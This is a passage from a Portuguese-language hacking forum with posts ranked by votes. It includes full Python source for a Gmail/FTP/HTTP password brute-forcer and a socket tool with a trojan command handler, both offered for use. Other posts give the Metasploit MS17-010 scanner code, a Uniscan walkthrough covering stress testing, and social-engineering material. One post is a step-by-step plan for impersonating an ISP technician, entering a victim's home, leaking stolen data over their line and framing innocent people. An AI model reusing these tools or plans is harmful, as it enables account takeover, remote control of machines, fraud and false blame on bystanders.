    ServiceBrute - Ferramenta para ataques de brute-force em serviços SMTP, FTP e HTTP Como eu não consigo passar um dia sem escrever código, hoje não seria diferente :v Criei esse simples código para ataques de brute-force em serviços SMTP (G-Mail), FTP e HTTP. Segue o código: #!/usr/bin/python # -*- coding: cp1252 -*- from ftplib import FTP import smtplib import sys import os import platform import ftplib try: import colorama from colorama import Fore, Back, Style except ImportError: print "ERRO! - Necessario a biblioteca COLORAMA. \n Instale com - easy_install colorama" try: import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning except ImportError: print Fore.RED+"ERRO! - Necessario a biblioteca REQUESTS. \n Instale com - easy_install requests" colorama.init() so = platform.system() if(so=="Windows"): os.system("cls") else: os.system("clear") try: def help(): ajuda = """ HELP MODULE - ServiceBrute servicebrute.py --form 1 --email <target_email> --wordlist <passfile.txt> Example: servicebrute.py --form 1 --email [email protected] --wordlist passwordfile.txt servicebrute.py --form 2 --user <target_user> --wordlist <passfile.txt> --target <target_url> Example: servicebrute.py --form 2 --user admin --wordlist passwordfile.txt --target http://www.target.com servicebrute.py --form 3 --user <target_user> --wordlist <passsfile.txt> --target <target_url> Example: servicebrute.py --form 3 --user admin --wordlist passwordfile.txt --target http://www.target.com servicebrute.py --form 4 --user <target_user> --wordlist <passfile.txt> --target <target_url> Example: servicebrute.py --form 4 --user admin --wordlist passwordfile.txt --target ftp.target.com """ print(Fore.CYAN+ajuda) x = sys.argv if x[1] == "--form": forma = sys.argv[2] if forma == "1": if x[3] == "--email": email = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] wordlist = open(wordlist, "r") smtp = smtplib.SMTP("smtp.gmail.com", 587) smtp.ehlo() smtp.starttls() for senhas in wordlist: try: smtp.login(email, senhas) print Fore.GREEN+"Senha encontrada : \n E-mail - %s \n Senha - %s"%(email,senhas) break except smtplib.SMTPAuthenticationError: print Fore.RED+"Tentando login : \n E-MAIL - %s \n SENHA - %s"%(email,senhas) if x[1] == "--form": forma = sys.argv[2] if forma == "2": if x[3] == "--user": user = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] senha = open(wordlist, "r") if x[7] == "--target": target = sys.argv[8] for senhas in senha: r = requests.get(target+"/login.php?user="+user+"&password="+senhas) if r.status_code == 302: print Fore.GREEN+"[!] SENHA ENCONTRADA : \n Usuario: %s - \n Password: %s"%(user,senhas) else: print Fore.RED+"Tentando login : \n Usuario: %s - \n Password: %s"%(user,senhas) if x[1] == "--form": forma = sys.argv[2] if forma == "3": if x[3] == "--user": user = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] senha = open(wordlist, "r") if x[7] == "--target": target = sys.argv[8] form_user = (str(raw_input(Fore.GREEN+"Formulario de usuario: "))) form_pass = (str(raw_input(Fore.GREEN+"Formulario de senhas: "))) for senhas in senha: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) payload = { form_user : user, form_pass : senhas } r = requests.post(target, data=payload, verify=False) if r.status_code == 302: print Fore.GREEN+"[!] SENHA ENCONTRADA : \n Usuario: %s - \n Password: %s"%(user,senhas) break else: print Fore.RED+"Tentando login : \n Usuario: %s - \n Password: %s"%(user,senhas) if x[1] == "--form": forma = sys.argv[2] if forma == "4": if x[3] == "--user": user = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] senha = open(wordlist, "r") if x[7] == "--target": target = sys.argv[8] for senhas in senha: try: ftp = FTP(target) ftp.login(user,senhas) print Fore.GREEN+"[!] SENHA ENCONTRADA : \n Usuario: %s - \n Password: %s"%(user,senhas) except ftplib.error_perm: print Fore.RED+"Tentando login : \n Usuario: %s - \n Password: %s"%(user,senhas) if x[1] == "--help": help() except IndexError: banner = """ )\ ) ( ) (()/( ( ( ) ( ( ( )\ ( ( ( /( ( /(_)) ))\ )( /(( )\ ( ))\ )((_) )( ))\ )\()) ))\ (_)) /((_)(()\ (_))\((_) )\ /((_)((_)_ (()\ /((_)(_))/ /((_) / __|(_)) ((_)_)((_)(_) ((_)(_)) | _ ) ((_)(_))( | |_ (_)) \__ \/ -_) | '_|\ V / | |/ _| / -_) | _ \| '_|| || || _|/ -_) |___/\___| |_| \_/ |_|\__| \___| |___/|_| \_,_| \__|\___| Ferramenta para bruteforce em servicos Desenvolvido por Derick Santos Conheça a FSociety Brasil: https://fsocietybrasil.org\n servicebrute.py --help para mais funções\n - [1] G-Mail BRUTEFORCE - [2] HTTP-GET BRUTEFORCE - [3] HTTP-POST BRUTEFORCE - [4] FTP BRUTEFORCE""" print(Fore.YELLOW+banner) except KeyboardInterrupt: print Fore.GREEN+"Até mais..."
  23. 2 pontos
    Olá! Novo aqui, conheci através do Facebook. Gosto da área de tecnologia e me inspiro muito na série Mr.robot e tudo que envolve hackers. De modo geral sabe aquela vontade de hackear o mundo mas não saber nem por onde começar? Esse sou eu, atualmente empreendedor, mas logo logo minha máquina ta pronta e voltarei com tudo. A primeira mão quando voltei pra minha cidade natal estava sem net em casa. Em apenas 2 dias aprendi quase todos os métodos possíveis em descobrir redes, seja pelo wps usando Reaver, aircrack-ng bruteforce, linset, Goyiscript etc. Aprendi vários outros meios de engenharia social, invasão Android etc. Quero me aprofundar na área de invasão de redes e dispositivos, exploits em geral, deface, ramsoware entre outros. Nada que prejudique alguém, porém nunca se sabe onde seu conhecimento pode te levar. Chega de textão, conteúdo muito bacana, adorei! Tamo junto, todo conhecimento é pouco, vlw FSbr.
  24. 2 pontos
    Aí galera, Uma dica fácil e rápida pra quem quer ter: kali linux, backdoor, wifislax, pendora...ect... rodando no pen drive. Aqui nós precisaremos de três coisas: 1º) As .isos das distribuições que você quer colocar (ex: kali linux e a wifislax...); 2º) Um pendrive com espaço para colocar as .isos; 2º) Multisystem, o programa que vai importar as isos para o pendrive. nós iremos baixar pelo terminal Então abre ele aí e coloca os comandos abaixo: (comentário: tamanho do arquivo 208MB) sudo gedit /etc/apt/sources.list adicione a seguinte linha ao final do arquivo que se abriu: deb http://liveusb.info/multisystem/depot all main Salve o arquivo e ainda no terminal cole o seguinte comando para adicionar a chave: wget -q http://liveusb.info/multisystem/depot/multisystem.asc -O- | sudo apt-key add - E agora vamos instalar com um comando só: sudo apt-get update && sudo apt-get install multisystem ________________________________________________________________________________________________________ Depois de ter optado [s/n] para baixar, ele vai instalar.. [1] Procure na barra de busca do unity "multisystem"; [2] Depois que você abrir o programa selecione o pen drive que você vai utilizar e clique em validar; [3]Vai gerar uma advertencia, clique em ok. [4] você terar que ejetar o pen drive depois tirar do computador e colocar novamente; [5] Você abre o multisystem novamente, selecione o pendrive que você vai usar e clica em validar de novo [6] vai abrir uma janela assim: [7] Clique no CD lá embaixo para procurar a .iso e depois clique nesse botão azul pra transferir a iso. coloque a senha e depois vai abrir um terminal mostrando o processo, depois que terminar o processo, você pode adicionar as isos que você tiver. Espero ter ajudado !
  25. 2 pontos
    Flying - Script para manipulação de sockets Pessoal, criei esta ferramenta para "manipulação de sockets" em Python. Ela é bastante parecida com o nc, porém com algumas funções voltadas mais para o pentest. Sendo elas: --listening | Função para escutar portas. --trojan | Função que ativa um cliente de um trojan. --dns | Retorna o Domain Name Service de um endereço IP. --grabing | Realiza um banner grabing HTTP. O código esta disponível para vocês compartilharem e até mesmo alterarem ele. Divirtam-se! #!/usr/bin/python # -*- coding:utf-8 -*- ####################################################### ### Desenvolvido por Derick Santos ### ### Conheça a Fsociety Brasil: fsocietybrasil.org ### ####################################################### try: import platform import socket import sys import os so = platform.system() if so == "Windows": os.system("cls") else: os.system("clear") x = sys.argv def help(): module = """ Flying - Ferramenta em Python para manipulação de sockets Desenvolvido por Derick Santos Conheça a FSociety Brasil: https://fsocietybrasil.org/ ############################################################## flying.py --listening <host> <port> | Escuta determinada porta Exemplo: flying.py --listening 127.0.0.1 3030 flying.py --trojan <host> <port> | Cliente de um trojan Exemplo: flying.py --trojan 127.0.0.1 3030 flying.py --dns <host> | Pegar DNS por endereço IP Exemplo: flying.py --dns 127.0.0.1 flying.py --grabing <host> | Realizar banner grabing em serviços HTTP Exemplo: flying.py --grabing www.google.com""" print(module) try: if(x[1]=="--listening"): host = sys.argv[2] port = (int(sys.argv[3])) print "Escutando porta %s de %s\n"%((port,host)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host,port)) s.listen(1) conn, addr = s.accept() print "Conexao de",addr while True: log = conn.recv(1024) if not log: break conn.sendall(log) conn.close() except: help() try: if(x[1]=="--trojan"): ip = sys.argv[2] port = (int(sys.argv[3])) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((ip,port)) s.listen(5) print "\n: Esperando conexao..." conn, addr = s.accept() msg = conn.recv(512) print(msg) shell = True while shell == True: cmd = raw_input("B:\> ") conn.send(cmd) msg = conn.recv(10000000) print(msg) except: exit() try: if (x[1]=="--dns"): host = sys.argv[2] ip = socket.gethostbyname(host) d = socket.getfqdn(ip) print "DNS -> "+d except: exit() try: if (x[1]=="--grabing"): site = sys.argv[2] port = (int("80")) ip = socket.gethostbyname(site) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect_ex((ip,port)) s.send(b"GET /\n\n") banner = s.recv(10000) print "Banner - %s"%banner except: exit() except KeyboardInterrupt: print "Até mais!"
  26. 2 pontos
    [Dica](É essa tag produção?) Tem um site muito bom para o aprendizado de inglês,o learning english Ele tem vários artigos (vídeos também) artigos que tratam de assuntos aleatórios,e o objetivo é você ler(se quiser tem como baixar o áudio para melhorar o listening) e interpretar o texto,e então responder a um quiz para testar se você realmente entendeu o texto. Funciona bem ,tanto para interpretação de texto e inglês(até mesmo o conteúdo dos artigos) Site: http://learningenglish.voanews.com
  27. 2 pontos
    Ataque de BRUTE-FORCE em serviços MySQL com o METASPLOIT O ataque de brute-force, é um ataque a qual auditamos em uma aplicação realizando um teste de login, ou seja, o atacante passa a lista de senhas, a lista de usuários e o programa vai tentando o login de forma automática no serviço rodando no alvo. O MySQL é um serviço de gerenciamento de banco de dados, o Metasploit bastante conhecido no mundo da segurança da informação tem módulos para enumerarem em um servidor MySQL. Neste tópico, lhes mostro um vídeo demonstrando um ataque de força bruta em serviços MySQL e um crack de hash MySQL através do próprio Metasploit.
  28. 2 pontos
    Muito bom cara! Poste em nosso grupo de Facebook também: facebook.com/groups/fsocietybrasil
  29. 2 pontos
    Este vídeo criado pela Cisco mostra como funciona a engenharia social por trás de um ataque de ramsomware. Confiram: Neste portal da Kaspersky existem algumas dicas de como estar protegido: https://blog.kaspersky.com.br/ransomware-10-tips/5866/
  30. 2 pontos
    Então, esse erro também pode ocorrer com o VMware. Só que ele buga menos pra algumas distros. Agora, uma coisa que resolveu pra mim foi aumentar o número de processadores que a VM utilizaria. Com 1 processador ativo(um núcleo) meu Caine bugava, passei para 2 e posso ficar 1 hora sem mexer na VM que quando eu volto basta clicar na tela. Ela pode demorar uns 2 segundos mas a tela fica normal. Fora, que eu sempre detestei usar VM. Porém, o aumento da quantidade de núcleos que eu utilizo agora fez com que eu pudesse me sentir beem mais confortável. Recomendo.
  31. 2 pontos
    É fácil ter uma falsa sensação de segurança, pensando que outro sistema operacional pode ser mais direcionado do que o Linux, mas há uma abundância de riscos e vulnerabilidades para todos os tipos de dispositivos Linux. Mantenha sua guarda, independentemente do seu sistema operacional. Isto deve ser necessário, mas, mesmo assim, certifique-se de usar sempre uma forte e longa senha. Para a computação diária, faça login em uma conta de usuário básica e use sudo ou a conta de root somente quando necessário. É provável que este seja o comportamento padrão, mas vale a pena verificar o status da sua conta. Full disk encryption é o ideal, mas também é possível criptografar apenas o seu diretório home, por exemplo, em uma mesma máquina. Normalmente, isso é feito durante a instalação, e é difícil fazer depois. Nessa situação, a solução mais fácil é fazer backup de seus dados (sempre uma coisa boa!) e, em seguida, re-instalar o sistema operacional selecionando opções de criptografia. Se você realmente quiser tentar criptografar um sistema existente, o processo varia, dependendo da sua distribuição e partição de disco de instalação, então é melhor procurar por instruções relevantes para o seu ambiente. Reduza o tempo para o bloqueio entrar em vigor uma vez que o screensaver começa. É uma boa prática manter os aplicativos instalados no mínimo. Não só isso mantém sua máquina leve, mas também reduz sua exposição a vulnerabilidades. Além de examinar manualmente sua lista de aplicativos, talvez existam ferramentas disponíveis para sua distribuição, como o BleachBit. É normalmente fácil de manter o Linux e aplicativos instalados até a data. Pelo menos, certifique-se de que as atualizações de segurança são instaladas automaticamente. Isso pode ser feito através da instalação de um detector de rootkit, tais como o chkrootkit, que é facilmente executado com o comando sudo chkrootkit. Se você usar SSH para acesso remoto, existem algumas etapas simples para reduzir o risco de ataque. O mais fácil é usar uma porta diferente da porta padrão 22. Você também pode impedir o login remoto como root com PermitRootLogin no arquivo de configuração SSH. Este artigo tem mais dicas para proteger o SSH. Alguns daemons ouvem em portas externas. Desative esses serviços se não for necessário, por exemplo, sendmail ou bind. Isso também pode melhorar os tempos de inicialização. Para verificar se há serviços de escuta, use este comando: netstat -l | Grep tcp Seu sistema operacional pode ter um firewall embutido já, provavelmente iptables. Os firewalls podem ser confusos para configurar com a linha de comando, mas é provável que haja um frontend GUI disponível para controle mais fácil, como o Gufw. Estes podem ser instalados em seu sistema, por padrão, mas se não, vale a pena adicionar e configura-los. Ambos permitem aos usuários definir regras que limitam o modo como os aplicativos podem ser executados ou afetar outros processos e arquivos. A vantagem é que no caso de um ataque, os danos ao seu sistema é limitado. Você pode ler mais aqui sobre como usar o SELinux e o AppArmor. By: Wheezy Sec Fonte: https://spreadprivacy.com/linux-privacy-tips-1dc956657357
  32. 2 pontos
    Scan exploit cve-2017-010 Eternalblue-doublepulsar Ta ai um scanner pra verificar se o sistema alvo esta vulnerável a falha ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # auxiliary/scanner/smb/smb_ms_17_010 require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'MS17-010 SMB RCE Detection', 'Description' => %q{ Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. This module does not require valid SMB credentials in default server configurations. It can log on as the user "\\" and connect to IPC$. }, 'Author' => [ 'Sean Dillon <[email protected]>' ], 'References' => [ [ 'CVE', '2017-0143'], [ 'CVE', '2017-0144'], [ 'CVE', '2017-0145'], [ 'CVE', '2017-0146'], [ 'CVE', '2017-0147'], [ 'CVE', '2017-0148'], [ 'MSB', 'MS17-010'], [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'] ], 'License' => MSF_LICENSE )) end def run_host(ip) begin status = do_smb_probe(ip) if status == "STATUS_INSUFF_SERVER_RESOURCES" print_warning("Host is likely VULNERABLE to MS17-010!") report_vuln( host: ip, name: self.name, refs: self.references, info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$' ) elsif status == "STATUS_ACCESS_DENIED" or status == "STATUS_INVALID_HANDLE" # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others) print_good("Host does NOT appear vulnerable.") else print_bad("Unable to properly detect if host is vulnerable.") end rescue ::Interrupt print_status("Exiting on interrupt.") raise $! rescue ::Rex::Proto::SMB::Exceptions::LoginError print_error("An SMB Login Error occurred while connecting to the IPC$ tree.") rescue ::Exception => e vprint_error("#{e.class}: #{e.message}") ensure disconnect end end def do_smb_probe(ip) connect # logon as user \ simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) # connect to IPC$ ipc_share = "\\\\#{ip}\\IPC$" simple.connect(ipc_share) tree_id = simple.shares[ipc_share] print_status("Connected to #{ipc_share} with TID = #{tree_id}") # request transaction with fid = 0 pkt = make_smb_trans_ms17_010(tree_id) sock.put(pkt) bytes = sock.get_once # convert packet to response struct pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct pkt.from_s(bytes[4..-1]) # convert error code to string code = pkt['SMB'].v['ErrorClass'] smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new status = smberr.get_error(code) print_status("Received #{status} with FID = 0") status end def make_smb_trans_ms17_010(tree_id) # make a raw transaction packet pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct simple.client.smb_defaults(pkt['Payload']['SMB']) # opcode 0x23 = PeekNamedPipe, fid = 0 setup = "\x23\x00\x00\x00" setup_count = 2 # 2 words trans = "\\PIPE\\\x00" # calculate offsets to the SetupData payload base_offset = pkt.to_s.length + (setup.length) - 4 param_offset = base_offset + trans.length data_offset = param_offset # + 0 # packet baselines pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode pkt['Payload']['SMB'].v['TreeID'] = tree_id pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count pkt['Payload'].v['ParamCountMax'] = 0xffff pkt['Payload'].v['DataCountMax'] = 0xffff pkt['Payload'].v['ParamOffset'] = param_offset pkt['Payload'].v['DataOffset'] = data_offset # actual magic: PeekNamedPipe FID=0, \PIPE\ pkt['Payload'].v['SetupCount'] = setup_count pkt['Payload'].v['SetupData'] = setup pkt['Payload'].v['Payload'] = trans pkt.to_s end end
  33. 2 pontos
    É questão da OBI, costuma ser bem complicado mesmo. Dá uma olhada nisso aqui, o cara parece explicar tudinho.
  34. 2 pontos
  35. 2 pontos
    Livro de engenharia social escrito por um dos maiores Hackers da História, leiam abaixo: https://www.docdroid.net/Mq0Edkm/kevin-mitnick-a-arte-de-enganar.pdf.html
  36. 2 pontos
    FcSF | FaceOs Framework Pessoal, criei esse simples framework para information gathering. Ele tem simples funções no momento, mas futuramente pretendo atualiza-lo e adicionar mais funções nele. Download É necessario a biblioteca requests. Para baixa-la: easy_install requests ou: pip install requests
  37. 2 pontos
    Uniscan E aí pessoal hoje trago-lhes um tutorial da ferramenta Uniscan. Vou ensina-los a coletar informações e escanear vulnerabilidades com ele. Então vamos lá. Bem, se você estiver no Linux dê um: wget https://github.com/poerschke/Uniscan/archive/master.zip Ou git clone https://github.com/poerschke/Uniscan/ Eu como estou no Windows, baixei pelo browser. Você pode fazer o mesmo. Enfim... Com Uniscan baixado, basta extrairmos os arquivos, abrir o Terminal/CMD e ir até a pasta dele. Com a pasta do Uniscan aberta, digite: perl uniscan.pl -h Com isto, iremos ver as funções do programa. Vamos começar pela primeira função, digite: perl uniscan.pl -u <site> Com esta sintaxe, a gente esta dizendo pro programa escanear o site que a gente selecionou. Agora vamos na segunda função, digite: perl uniscan.pl -f <nome_de_um_arquivo_com_lista_de_sites> Bem, vou explicar com mais calma pra vocês. Esta sintaxe, diz ao programa, para escanear os sites do arquivo de texto. Ai ele vai realizar o scan em cada site da lista. Já na terceira função, digite: perl uniscan.pl -u <site> -q Com esta função, o programa vai checar diversos diretórios do site. Muito legal para a coleta de informações. Na quarta função, digite: perl unisca.pl -u <site> -w Com esta função, o programa vai procurar por arquivos com alguma vulnerabilidade no site. Agora a quarta função: perl uniscan.pl -u <site> -e Com esta função, o programa vai procurar pelo robots.txt. Agora, na quinta função, tenho certeza que é a que mais vão gostar: perl uniscan.pl -u <site> -d Com esta função, o programa vai realizar testes dinâmicos, ou seja, ele vai buscar pelas vulnerabilidades no serviço web. Agora, outra função SHOW de bola do Uniscan: perl uniscan.pl -u <site> -s Com esta função, o programa realiza testes estáticos, procura por arquivos de backup, realiza busca por informações de cache e uma série de coisas. Agora, outra função bastante legal do programa é: perl uniscan.pl -u <site> -r Com esta função, o programa realiza testes de stress e vê se o site possui vulnerabilidades de negação de serviço. Enfim, terminei aqui de mostrar as funções mais legais do programa, e caso você queira usar todas elas de uma vez, basta digitar: perl uniscan.pl -u <site> -qweds Também tem outras funções que são as de busca por dorks: perl uniscan.pl -o <inurl/intitle/intext/filetype/site:"dork"> Esta função, faz a busca de dorks pelo Google. E esta: perl uniscan.pl -i <inurl/intitle/intext/filetype/site:"dork"> Pelo o bing. Então pessoal, este basicamente foi o tutorial. Espero que tenham gostado, e que gostem da ferramenta também. É uma excelente ferramenta para a arte do information gathering e espero que gostem dela. Obrigado, até a proxima
  38. 2 pontos
    Engenharia social (segurança da informação) Em Segurança da informação, chama-se Engenharia Social as práticas utilizadas para obter acesso a informações importantes ou sigilosas em organizações ou sistemas por meio da enganação ou exploração da confiança das pessoas. Para isso, o golpista pode se passar por outra pessoa, assumir outra personalidade, fingir que é um profissional de determinada área, etc. É uma forma de entrar em organizações que não necessita da força bruta ou de erros em máquinas. Explora as falhas de segurança das próprias pessoas que, quando não treinadas para esses ataques, podem ser facilmente manipuladas. Entendendo a Engenharia Social Engenharia social compreende a inaptidão dos indivíduos manterem-se atualizados com diversas questões pertinentes a tecnologia da informatica, além de não estarem conscientes do valor da informatica que eles possuem e, portanto, não terem preocupação em proteger essa informação conscientemente. É importante salientar que, a engenharia social é aplicada em diversos setores da segurança da informação independente de sistemas computacionais, software e ou plataforma utilizada, o elemento mais vulnerável de qualquer sistema de segurança da informação é o ser humano, o qual possui traços comportamentais e psicológicos que o torna suscetível a ataques de engenharia social. Dentre essas características, pode-se destacar: Vaidade pessoal e/ou profissional: O ser humano costuma ser mais receptivo a avaliação positiva e favorável aos seus objetivos, aceitando basicamente argumentos favoráveis a sua avaliação pessoal ou profissional ligada diretamente ao benefício próprio ou coletivo de forma demonstrativa. Autoconfiança: O ser humano busca transmitir em diálogos individuais ou coletivos o ato de fazer algo bem, coletivamente ou individualmente, buscando transmitir segurança, conhecimento, saber e eficiência, buscando criar uma estrutura base para o início de uma comunicação ou ação favorável a uma organização ou individuo. Formação profissional: O ser humano busca valorizar sua formação e suas habilidades adquiridas nesta faculdade, buscando o controle em uma comunicação, execução ou apresentação seja ela profissional ou pessoal buscando o reconhecimento pessoal inconscientemente em primeiro plano. Vontade de ser útil: O ser humano, comumente, procura agir com cortesia, bem como ajudar outros quando necessário. Busca por novas amizades: O ser humano costuma se agradar e sentir-se bem quando elogiado, ficando mais vulnerável e aberto a dar informações. Propagação de responsabilidade: Trata-se da situação na qual o ser humano considera que ele não é o único responsável por um conjunto de atividades. Persuasão: Compreende quase uma arte a capacidade de persuadir pessoas, onde se busca obter respostas específicas. Isto é possível porque as pessoas possuem características comportamentais que as tornam vulneráveis a manipulação A engenharia social não é exclusivamente utilizada em informática, a engenharia social é uma ferramenta onde exploram-se falhas humanas em organizações físicas ou jurídicas onde operadores do sistema de segurança da informação possuem poder de decisão parcial ou total ao sistema de segurança da informação seja ele físico ou virtual, porém devemos considerar que as informações pessoais, não documentadas, conhecimentos, saber, não são informações físicas ou virtuais, elas fazem parte de um sistema em que possuem características comportamentais e psicológicas na qual a engenharia social passa a ser auxiliada por outras técnicas como: leitura fria, linguagem corporal, leitura quente, termos usados no auxílio da engenharia social para obter informações que não são físicas ou virtuais mas sim comportamentais e psicológicas.Exemplo você recebe uma mensagem e-mail, onde o remetente é o gerente ou alguém em nome do departamento de suporte do seu banco. Na mensagem ele diz que o serviço de internet Banking está apresentando algum problema e que tal problema pode ser corrigido se você executar o aplicativo que está anexado à mensagem. A execução deste aplicativo apresenta uma tela análoga àquela que você utiliza para ter acesso a conta bancária, aguardando que você digite sua senha. Na verdade, este aplicativo está preparado para furtar sua senha de acesso a conta bancária e enviá-la para o atacante. Exemplo-2 algum desconhecido liga para a sua casa e diz ser do suporte técnico do seu provedor. Nesta ligação ele diz que sua conexão com a internet está apresentando algum problema e, então, pede sua senha para corrigi-lo. Caso você entregue sua senha, este suposto técnico poderá realizar uma infinidade de atividades maliciosas, utilizando a sua conta de acesso a internet e, portanto, relacionando tais atividades ao seu nome. Tipos de técnica Abordagem pessoal: Está técnica consiste do Engenheiro Social realizar uma visita na empresa alvo, podendo se passar por um fornecedor, terceiro, amigo do diretor, prestador de serviço, entre outros, no qual através do poder de persuasão e falta de treinamento dos funcionários, consegue sem muita dificuldade convencer um segurança, secretária, recepcionista a liberar acesso ao datacenter onde possivelmente conseguirá as informações que procura. Apesar desta abordagem ser arriscada, muitos Crackers já utilizaram e a utilizam até hoje.Contato Telefônico: Com as informações coletadas nas duas técnicas acima, o Engenheiro Social pode utilizar uma abordagem via telefone para obter acesso não autorizado, seja se passando por um funcionário da empresa, fornecedor ou terceiros. Com certeza neste ponto o Engenheiro Social já conhece o nome da secretária, nome e e-mail de algum gestor, até colaboradores envolvidos na TI. Com um simples telefonema e técnicas de Engenharia Social se passando por outra pessoa, de preferência do elo de confiança da vítima, fica mais fácil conseguir um acesso ou coletar informações necessárias da organização.Internet e Redes Sociais: Atualmente muitas informações podem ser coletadas através da Internet e Redes Sociais sobre o alvo. Quando um Engenheiro Social precisa conhecer melhor seu alvo, esta técnica é utilizada, iniciando um estudo no site da empresa para melhor entendimento, pesquisas na Internet e uma boa consulta nas redes sociais na qual é possível encontrar informações interessantes de funcionários da empresa, cargos, amizades, perfil pessoal, entre outros.Para de um entendimento melhor sobre o assunto abordado, vou deixar aqui umas frases tiradas do livro "MitNick""Os engenheiros sociais habilidosos são adeptos do desenvolvimento de um truque que estimula emoções tais como medo, agitação, ou culpa. Eles fazem isso usando os gatilhos psicológicos – os mecanismos automáticos que levam as pessoas a responderem as solicitações sem uma análise cuidadosa das informações disponíveis.” (MITNICK, 2003, p.85)"“Engenharia social usa a influência e a persuasão para enganar as pessoas e convence-las de que o engenheiro social é alguém que ele não é, ou pela manipulação. Como resultado, o engenheiro social pode aproveitar-se das pessoas para obter as informações com ou sem uso da tecnologia.” (MITNICK, 2003, p.6)*referências: SET (Social Engineer Toolkit) e MITNICK (A Arte de Enganar).* A arte de enganar: http://lelivros.love/book/baixar-livro-a-arte-de-enganar-kevin-d-mitnick-em-pdf-epub-e-mobi
  39. 2 pontos
    Olá pessoal, Me chamo Filip, sou apaixonado pela área de desenvolvimento, estudei C e Java no início dos meus estudos e hoje gosto de me aventurar pelo python e PHP! Gosto muito dos conteúdos do hacktivismo e me interesso em me aprofundar cada vez mais nesse meio. Apesar de ter um objetivo muito ideológico, eu procuro ser o mais profissional nas práticas hackers possível. Enfim, gosto muito da implantação da filosofia no hackerismo (que aliás gostaria de discutir sobre isso com vocês mais tarde), então eu sempre vou ligar ideias filosóficas nos meus posts por aqui! Conheci o fórum através da série Mr. Robot (como muitos) e vou procurar interagir o máximo para que possamos compartilhar informações à beça Bom, é isso, muito prazer e até uma próxima a todos! GeneraL.
  40. 2 pontos
    Olá Taiga! Bem-vinda, sou novo aqui também... Espero que eu possa lhe ajudar em alguma coisa, se precisar, pode me chamar!
  41. 2 pontos
    1º PASSO > encontre um notebook usado em algum site de desapego > entre em contato com o vendedor por um telefone público > encontre-o num local super movimentado e de preferência evitando câmeras (se houver) > se você for homem e ele também, tire a atenção de você (faça ele olhar as mulheres, por exemplo) > se ele não tiver formatado, nem se preocupe com isso 2º PASSO > vá para duas cidades de distância > encontre uma costureira > mostre fotos do uniforme da provedora de internet da sua cidade > use a engenharia social, faça com que ela crie um uniforme social para você > desenvolva um crachá de supervisor/coordenador > imprima uma ordem de serviço falsa para uma emergência regional > coloque um boné > passe lápis no olho e algum tipo de maquigem (BBCream é uma boa sacada, pois te escurece ou te clareia) > coloque brincos (pode ser esses falsos e 1,99) > tente mudar o máximo de aparência 3º PASSO > tem carro? Ótimo. Se não tiver pegue emprestado > leve uma escada escalonável (dizem que basta pesquisar "escada alumínio 4 metros" no mercado livre > vá para um bairro calmo > ao chegar próximo ao local, modifique sua placa com fita isolante > vá para o local e suba em algum poste > no poste, comece mexer e fingir conectar cabos na caixa de telefone de alguém > alguém vai aparecer (claro que vai aparecer, todo mundo se preocupa ao ver um técnico num poste... "ai meu deus, minha internet"..."vai estragar minha linha"... então com certeza vão perguntar para você do que se trata) > questione a pessoa sobre a linha telefônica dela, consecutivamente sobre a conexão de internet > ela vai falar que está tudo bem, então diga a ela que algum vizinho (sei lá, escolha um, pode ser na rua de trás) está com problemas de conexão > peça para analisar a internet dela, para poder fazer um comparativo de dados e configurações > leve seu notebook já pré-configurado para VPN e Próxy > entre na casa da vítima > acesse a internet dela pelo cabo ADSL > entre nas configurações do routeador, somente para fingir que está fazendo algo > diga que agora precisa fazer um teste, então faça o upload dos dados que você conseguiu da NSA > diga para ela que encontrou o erro e que precisa utilizar o telefone dela somente para informar a central > forje culpados com a ligação fraudelenta: ligue para o vendedor do notebook > deixe-o antender (afinal, a vítima nem vai ligar se a ligação é para um celular, ela é totalmente inocente por já ter deixado você entrar na casa dela) > converse com esse cara com o intuíto da vítima acreditar que é a central, mas ao mesmo tempo tente conversar como se fosse algum tipo de código > peça muito obrigado e diga para ela que precisa ir finalizar o atendimento para o cliente que te ligou > esqueça, propositalmente, o notebook no local... (a vítima pode te lembrar? use a engenharia social, orasbolas! peça um copo d'água e esconda o notebook em baixo do sofá) > vá embora o mais rápido possível para que ela não se lembre do notebook. > vire a esquina e tire as fitas isolantes > vá embora Agora?! Observe seu maior feito! Divulgou seus dados da NSA (que eu não vou perguntar como conseguiu); forjou, no mínimo, dois culpados; se não cometeu nenhuma gafe, ficou totalmente anônimo. Evidentemente, não precisaria desse trabalho todo... era só comprar um notebook e acessar com seus conhecimentos a rede wifi de algum babaca por aí... Mas isso é coisa de lamer, arackers, script kiddie e idiotas. Faça um trabalho bem feito! Fique anônimo e coloque um culpado. Ou melhor... nesse caso, dois! Ou você achou que um grande hacker/cracker/phreaker não tira a bunda da cadeira de casa?!
  42. 2 pontos
